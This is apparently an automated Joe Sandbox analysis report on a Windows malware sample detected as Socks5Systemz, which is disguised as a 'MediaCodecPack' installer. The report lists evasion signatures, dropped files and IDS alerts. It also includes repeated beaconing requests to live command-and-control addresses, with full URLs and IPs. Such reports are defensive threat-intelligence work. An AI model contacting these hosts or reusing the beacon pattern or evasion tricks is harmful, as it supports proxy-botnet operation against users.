Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hbq580QZAR.exe

Overview

General Information

Sample name:Hbq580QZAR.exe
renamed because original name is a hash value
Original sample name:015bce2662bf644e819a99d3d2b0548b.exe
Analysis ID:1577885
MD5:015bce2662bf644e819a99d3d2b0548b
SHA1:cb27cb5da28a774e5590324b6062fc5953c09033
SHA256:d9ff5271da8e7ad2da78a2da803f4c2faed7c13da15700ce27547dc7c6529644
Tags:exeuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Hbq580QZAR.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\Hbq580QZAR.exe" MD5: 015BCE2662BF644E819A99D3D2B0548B)
    • Hbq580QZAR.tmp (PID: 1160 cmdline: "C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp" /SL5="$1042E,3196748,56832,C:\Users\user\Desktop\Hbq580QZAR.exe" MD5: ED6A19AD054AD0172201AF725324781B)
      • mediacodecpack.exe (PID: 2216 cmdline: "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i MD5: ADAB835347D3F69415F7ED6C10C13B85)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-K5SAB.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000001.00000002.2736047862.0000000005A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000003.00000000.1493879108.0000000000401000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000003.00000002.2735509305.0000000002CA1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: mediacodecpack.exe PID: 2216JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  3.0.mediacodecpack.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T21:09:00.658716+010020287653Unknown Traffic192.168.2.849708188.119.66.185443TCP
                    2024-12-18T21:09:06.384113+010020287653Unknown Traffic192.168.2.849711188.119.66.185443TCP
                    2024-12-18T21:09:08.727603+010020287653Unknown Traffic192.168.2.849712188.119.66.185443TCP
                    2024-12-18T21:09:11.182430+010020287653Unknown Traffic192.168.2.849714188.119.66.185443TCP
                    2024-12-18T21:09:13.655094+010020287653Unknown Traffic192.168.2.849715188.119.66.185443TCP
                    2024-12-18T21:09:15.958266+010020287653Unknown Traffic192.168.2.849716188.119.66.185443TCP
                    2024-12-18T21:09:18.459472+010020287653Unknown Traffic192.168.2.849718188.119.66.185443TCP
                    2024-12-18T21:09:20.767558+010020287653Unknown Traffic192.168.2.849724188.119.66.185443TCP
                    2024-12-18T21:09:23.091280+010020287653Unknown Traffic192.168.2.849730188.119.66.185443TCP
                    2024-12-18T21:09:25.363360+010020287653Unknown Traffic192.168.2.849736188.119.66.185443TCP
                    2024-12-18T21:09:27.664970+010020287653Unknown Traffic192.168.2.849742188.119.66.185443TCP
                    2024-12-18T21:09:29.948095+010020287653Unknown Traffic192.168.2.849748188.119.66.185443TCP
                    2024-12-18T21:09:32.225728+010020287653Unknown Traffic192.168.2.849753188.119.66.185443TCP
                    2024-12-18T21:09:34.496093+010020287653Unknown Traffic192.168.2.849759188.119.66.185443TCP
                    2024-12-18T21:09:36.805991+010020287653Unknown Traffic192.168.2.849765188.119.66.185443TCP
                    2024-12-18T21:09:39.297849+010020287653Unknown Traffic192.168.2.849771188.119.66.185443TCP
                    2024-12-18T21:09:41.570111+010020287653Unknown Traffic192.168.2.849778188.119.66.185443TCP
                    2024-12-18T21:09:43.826321+010020287653Unknown Traffic192.168.2.849784188.119.66.185443TCP
                    2024-12-18T21:09:46.121370+010020287653Unknown Traffic192.168.2.849790188.119.66.185443TCP
                    2024-12-18T21:09:48.410246+010020287653Unknown Traffic192.168.2.849796188.119.66.185443TCP
                    2024-12-18T21:09:50.869446+010020287653Unknown Traffic192.168.2.849799188.119.66.185443TCP
                    2024-12-18T21:09:53.153009+010020287653Unknown Traffic192.168.2.849807188.119.66.185443TCP
                    2024-12-18T21:09:55.624214+010020287653Unknown Traffic192.168.2.849814188.119.66.185443TCP
                    2024-12-18T21:09:57.893305+010020287653Unknown Traffic192.168.2.849820188.119.66.185443TCP
                    2024-12-18T21:10:00.351530+010020287653Unknown Traffic192.168.2.849825188.119.66.185443TCP
                    2024-12-18T21:10:02.934321+010020287653Unknown Traffic192.168.2.849831188.119.66.185443TCP
                    2024-12-18T21:10:05.249776+010020287653Unknown Traffic192.168.2.849838188.119.66.185443TCP
                    2024-12-18T21:10:07.733130+010020287653Unknown Traffic192.168.2.849845188.119.66.185443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T21:09:01.486334+010028032742Potentially Bad Traffic192.168.2.849708188.119.66.185443TCP
                    2024-12-18T21:09:07.101198+010028032742Potentially Bad Traffic192.168.2.849711188.119.66.185443TCP
                    2024-12-18T21:09:09.462001+010028032742Potentially Bad Traffic192.168.2.849712188.119.66.185443TCP
                    2024-12-18T21:09:11.888662+010028032742Potentially Bad Traffic192.168.2.849714188.119.66.185443TCP
                    2024-12-18T21:09:14.348609+010028032742Potentially Bad Traffic192.168.2.849715188.119.66.185443TCP
                    2024-12-18T21:09:16.668888+010028032742Potentially Bad Traffic192.168.2.849716188.119.66.185443TCP
                    2024-12-18T21:09:19.162482+010028032742Potentially Bad Traffic192.168.2.849718188.119.66.185443TCP
                    2024-12-18T21:09:21.528430+010028032742Potentially Bad Traffic192.168.2.849724188.119.66.185443TCP
                    2024-12-18T21:09:23.773716+010028032742Potentially Bad Traffic192.168.2.849730188.119.66.185443TCP
                    2024-12-18T21:09:26.062372+010028032742Potentially Bad Traffic192.168.2.849736188.119.66.185443TCP
                    2024-12-18T21:09:28.352868+010028032742Potentially Bad Traffic192.168.2.849742188.119.66.185443TCP
                    2024-12-18T21:09:30.664229+010028032742Potentially Bad Traffic192.168.2.849748188.119.66.185443TCP
                    2024-12-18T21:09:32.911095+010028032742Potentially Bad Traffic192.168.2.849753188.119.66.185443TCP
                    2024-12-18T21:09:35.212252+010028032742Potentially Bad Traffic192.168.2.849759188.119.66.185443TCP
                    2024-12-18T21:09:37.512182+010028032742Potentially Bad Traffic192.168.2.849765188.119.66.185443TCP
                    2024-12-18T21:09:40.000817+010028032742Potentially Bad Traffic192.168.2.849771188.119.66.185443TCP
                    2024-12-18T21:09:42.249515+010028032742Potentially Bad Traffic192.168.2.849778188.119.66.185443TCP
                    2024-12-18T21:09:44.511936+010028032742Potentially Bad Traffic192.168.2.849784188.119.66.185443TCP
                    2024-12-18T21:09:46.815980+010028032742Potentially Bad Traffic192.168.2.849790188.119.66.185443TCP
                    2024-12-18T21:09:49.109158+010028032742Potentially Bad Traffic192.168.2.849796188.119.66.185443TCP
                    2024-12-18T21:09:51.559680+010028032742Potentially Bad Traffic192.168.2.849799188.119.66.185443TCP
                    2024-12-18T21:09:53.859056+010028032742Potentially Bad Traffic192.168.2.849807188.119.66.185443TCP
                    2024-12-18T21:09:56.304733+010028032742Potentially Bad Traffic192.168.2.849814188.119.66.185443TCP
                    2024-12-18T21:09:58.595378+010028032742Potentially Bad Traffic192.168.2.849820188.119.66.185443TCP
                    2024-12-18T21:10:01.039673+010028032742Potentially Bad Traffic192.168.2.849825188.119.66.185443TCP
                    2024-12-18T21:10:03.652200+010028032742Potentially Bad Traffic192.168.2.849831188.119.66.185443TCP
                    2024-12-18T21:10:05.953618+010028032742Potentially Bad Traffic192.168.2.849838188.119.66.185443TCP
                    2024-12-18T21:10:08.478248+010028032742Potentially Bad Traffic192.168.2.849845188.119.66.185443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c325Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058Avira URL Cloud: Label: malware
                    Source: Hbq580QZAR.exeReversingLabs: Detection: 18%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D188
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0045D254 ArcFourCrypt,1_2_0045D254
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0045D23C ArcFourCrypt,1_2_0045D23C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack
                    Source: Hbq580QZAR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.8:49708 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-FG1GT.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-38DHO.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-FG1GT.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-L8DJ5.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-38DHO.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: global trafficTCP traffic: 192.168.2.8:49710 -> 31.214.157.206:2024
                    Source: Joe Sandbox ViewIP Address: 31.214.157.206 31.214.157.206
                    Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49708 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49711 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49712 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49718 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49736 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49724 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49730 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49742 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49748 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49753 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49759 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49765 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49771 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49778 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49784 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49796 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49790 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49807 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49820 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49814 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49831 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49825 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49845 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49838 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49799 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49796 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49765 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49708 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49759 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49730 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49778 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49784 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49807 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49838 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49845 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49820 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49748 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49715 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49736 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49718 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49831 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49753 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49825 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49790 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49799 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49742 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49724 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49771 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49814 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
